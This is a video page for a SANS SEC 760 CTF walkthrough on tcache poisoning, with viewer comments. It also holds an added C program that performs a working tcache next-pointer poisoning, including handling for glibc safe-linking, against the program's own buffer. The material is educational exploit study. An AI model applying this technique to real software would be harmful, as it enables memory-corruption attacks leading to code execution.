Remote Code Execution via Tcache Poisoning - SANS SEC 760 "Baby Heap" CTF

  • Published: 18 Oct 2024
  • A video walkthrough for SANS SEC 760's "Baby Heap" CTF challenge, which involved exploiting a format string vulnerability and a one-byte overflow to poison tcache and gain remote code execution.
    NOTE - There seem to be some slight errors in the video, my apologies!
    At 27:50, 0x101 is meant to be 257, not 254
    When explaining the A, M, and P flags for the heap chunks, those are supposed to be "bits", not "bytes"
    🔗 Links From Video:
    / 1233119624658481157
    azeria-labs.co...
    👨‍💻 Gear I Use:
    Microphone: Audio Technica AT2020USB+
    Camera: Logitech HD Pro Webcam C920
    Headphones: Shure SE215 (Sound Isolating)
    Keyboard: Ducky One White LED Double Shot PBT (MX Brown)
    Mouse: Logitech G703 Lightspeed
    💻 Social:
    Blog: jhalon.github.io
    Twitter: / jack_halon
    GitHub: github.com/jhalon
    Twitch: / jackhackslive
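    The two corrections above (0x101 is 257, and A/M/P are bits) and the description's one-byte overflow into tcache are easier to see in code than in prose. The following is an added example written for this page, not code from the video or from the SEC 760 course, and it does not reproduce the challenge binary. It assumes x86-64 glibc with tcache (2.26 or later); the names `chunk_size`, `request2size`, `overflow_reach`, `tcache_poison`, `demo_result` and `target_buf` are this example's own. It first decodes a size field into size and flag bits, then measures why malloc(0xf8) puts the next chunk's size byte exactly one byte past the buffer, and finally performs a tcache next-pointer poisoning, detecting whether the running glibc uses plain links or safe-linking (2.32+) before forging the pointer. Build it without sanitizers, since the poisoning step writes to freed memory on purpose.

```c
/* Added example, not the video's or SEC 760's code.  Assumes x86-64 glibc
 * with tcache (>= 2.26); tcache_poison, target_buf, overflow_reach and the
 * other names here are this example's own.  Build without sanitizers: the
 * poisoning step writes to freed memory on purpose, as an overflow would. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The low three bits of a chunk's size field are flag bits, not bytes:
 * P = PREV_INUSE, M = IS_MMAPPED, A = NON_MAIN_ARENA.  A size field of
 * 0x101 (decimal 257) is a 0x100-byte chunk whose predecessor is in use. */
#define PREV_INUSE     0x1
#define IS_MMAPPED     0x2
#define NON_MAIN_ARENA 0x4
#define SIZE_BITS      (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)

size_t chunk_size(size_t size_field) { return size_field & ~(size_t)SIZE_BITS; }
int chunk_prev_inuse(size_t size_field) { return (size_field & PREV_INUSE) != 0; }

/* glibc's request2size() on 64-bit: 8 bytes of header, rounded up to 16,
 * minimum chunk 0x20.  malloc(0xf8) therefore gets a 0x100-byte chunk with
 * no slack: its user data ends exactly at the next chunk's size field. */
size_t request2size(size_t req) {
    size_t s = (req + 8 + 15) & ~(size_t)15;
    return s < 0x20 ? 0x20 : s;
}

/* Measure where the next chunk's size field sits relative to a live
 * allocation of `req` bytes (0xf8 for req == 0xf8, so a one-byte overflow
 * lands on the low byte of that size field).  Allocates a few chunks and
 * picks an adjacent pair; they are deliberately not freed so they never end
 * up in the tcache bin that tcache_poison() below relies on being empty. */
ptrdiff_t overflow_reach(size_t req) {
    size_t stride = request2size(req);
    char *p[8];
    for (int i = 0; i < 8; i++) p[i] = malloc(req);
    for (int i = 0; i + 1 < 8; i++)
        if (p[i + 1] == p[i] + stride)      /* carved back-to-back from top */
            return (p[i + 1] - 8) - p[i];   /* offset of next size field   */
    return -1;
}

enum { TC_UNRECOGNIZED = 0, TC_PLAIN = 1, TC_SAFE_LINKED = 2 };

/* Tcache poisoning: free two same-sized chunks so the bin holds b -> a, then
 * overwrite b's `next` link (first 8 bytes of its user data) with `target`.
 * The first malloc() returns b, the second returns `target`.  Since glibc
 * 2.32 the link is stored as (&next >> 12) ^ ptr ("safe-linking"), so the
 * encoding is detected from b's real link before forging.  Returns which
 * encoding was seen, or TC_UNRECOGNIZED (with *out NULL) if the allocator
 * does not behave like glibc tcache. */
int tcache_poison(void *target, void **out) {
    *out = NULL;
    char *a = malloc(0xf8), *b = malloc(0xf8);
    uintptr_t ua = (uintptr_t)a, ub = (uintptr_t)b;
    free(a);                                  /* bin 0x100: a            */
    free(b);                                  /* bin 0x100: b -> a       */

    void *volatile bv = b;                    /* read freed memory on purpose */
    uintptr_t raw; memcpy(&raw, bv, sizeof raw);
    uintptr_t mask = ub >> 12;                /* safe-linking mask for b->next */
    uintptr_t forged, tail;
    int mode;
    if (raw == ua) {                          /* glibc 2.26 .. 2.31: plain pointer */
        mode = TC_PLAIN;       forged = (uintptr_t)target;        tail = 0;
    } else if (raw == (mask ^ ua)) {          /* glibc >= 2.32: safe-linked */
        mode = TC_SAFE_LINKED; forged = mask ^ (uintptr_t)target; tail = (uintptr_t)target >> 12;
    } else {
        return TC_UNRECOGNIZED;
    }

    memcpy(target, &tail, sizeof tail);       /* target->next decodes to NULL, bin ends cleanly */
    memcpy(bv, &forged, sizeof forged);       /* the attacker's write: b->next = target */

    void *first  = malloc(0xf8);              /* b, unlinked normally       */
    void *second = malloc(0xf8);              /* follows the forged link    */
    (void)first;
    *out = second;
    return mode;
}

/* Must be 16-byte aligned: glibc >= 2.32 rejects unaligned tcache chunks. */
static char __attribute__((aligned(16))) target_buf[0x100];

/* 1 if malloc() handed back target_buf, 0 if the allocator was not recognized,
 * -1 if poisoning ran but malloc() returned something else. */
int demo_result(void) {
    void *got;
    int mode = tcache_poison(target_buf, &got);
    if (mode == TC_UNRECOGNIZED) return 0;
    return got == (void *)target_buf ? 1 : -1;
}

int main(void) {
    printf("size field 0x101 -> chunk size 0x%zx (%zu), PREV_INUSE=%d\n",
           chunk_size(0x101), chunk_size(0x101), chunk_prev_inuse(0x101));
    printf("malloc(0xf8) -> 0x%zx chunk; next chunk's size byte at user+0x%tx\n",
           request2size(0xf8), overflow_reach(0xf8));
    void *got = NULL;
    int mode = tcache_poison(target_buf, &got);
    printf("link encoding: %s; second malloc returned %p, target is %p\n",
           mode == TC_SAFE_LINKED ? "safe-linked" : mode == TC_PLAIN ? "plain" : "unknown",
           got, (void *)target_buf);
    return 0;
}
```

    Two practical points from running it: the forged link must already be mangled with `b >> 12` on glibc 2.32 and later, which is why a real exploit needs a heap address leak (here the format string bug in the challenge would supply it), and `target` must be 16-byte aligned or `malloc()` aborts with "unaligned tcache chunk detected". On glibc before 2.32 neither constraint exists.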

Comments • 18

  • @flyingtiger123
    @flyingtiger123 1 year ago

    I was confused by the technique for several days until I came across this. Fabulous video!

  • @shravyabhaskara8003
    @shravyabhaskara8003 2 years ago

    The explanation was so clear! I struggled with finding the proof of work for a challenge while playing CTFs. Glad I came across this video. Recently I've been trying to make a challenge based on tcache poisoning. Your video walkthrough really helped! Thanks a lot.

  • @rootedinside106
    @rootedinside106 4 years ago +1

    One of the most informative videos I have seen about heap exploiting! Thanks!

  • @kevinwydler7305
    @kevinwydler7305 10 months ago

    This is so informative and really well explained! Thank you so much

  • @antonsonj4995
    @antonsonj4995 1 year ago

    Thanks a ton!!! Really helpful video ❤️

  • @mesh3al32
    @mesh3al32 4 years ago +1

    Thank you for the very informative walkthrough, best Linux heap exploitation video :)

  • @lazlowcarmichael1829
    @lazlowcarmichael1829 3 years ago

    Absolutely phenomenal video. Illustrative and informative.

  • @TheVampirePlaysMc
    @TheVampirePlaysMc 4 years ago +1

    Really nice vid, learned a lot.
    Can you please explain why you have to use 0xf8 for the initial malloc for the one-byte overflow? Couldn't any size exploit the one-byte overflow?
    Another question: when did we exploit tcache? I didn't see where that came into play.

    • @texon7631
      @texon7631 4 years ago

      Tcache is a technique used by the heap (as you can see in the vid) to improve heap management; he clearly responds in the video to both of your questions.

  • @pwndumb2903
    @pwndumb2903 3 years ago

    I love the video. It's amazing. Thx. Can you tell me what software you used to create the animations (arrows and text) in the video? I'm not asking about the exploit because I have a lot to learn before understanding heap exploitation.

  • @ムワ-d7n
    @ムワ-d7n 4 years ago

    Nice walkthrough, more heap exploitation please

  • @manolo_averias
    @manolo_averias 2 years ago

    Great video man, come back

  • @superhero1
    @superhero1 4 years ago

    Great video! Thank you so much.

  • @markusdauberschmidt2969
    @markusdauberschmidt2969 4 years ago

    Which glibc are you using on your system? I don't have the same output using gef/pwndbg on libc2.27 (Ubuntu 18) when freeing the 2nd and 3rd chunk.

  • @fusca14tube
    @fusca14tube 4 years ago

    Hi JackHacks... first of all, thank you for your video. Can you help me? I'm trying to develop an exploit based on your heap exploitation, but my exploit freezes when I send data without '\n'. It only works if I use s.sendlineafter("Data: ", data), but I NEED to use s.sendafter("Data: ", data) (without '\n') to exploit the "off by one overflow" vulnerability. What am I doing wrong? Thanks in advance.

  • @anticharacter
    @anticharacter 4 years ago

    At 27:50, isn't 0x101 in decimal 257, not 254?

    • @JackHacks
      @JackHacks 4 years ago +1

      Yes, you would be correct! It would be 257; it seems I made a mistake in my script 😅. There seem to be some other errors, like when I say "bytes" instead of "bits" - will be putting out a disclaimer note for those soon.

  • @sezarstarscourge7368
    @sezarstarscourge7368 1 year ago

    0x101 = 257, you made a little mistake: 254; but it's cool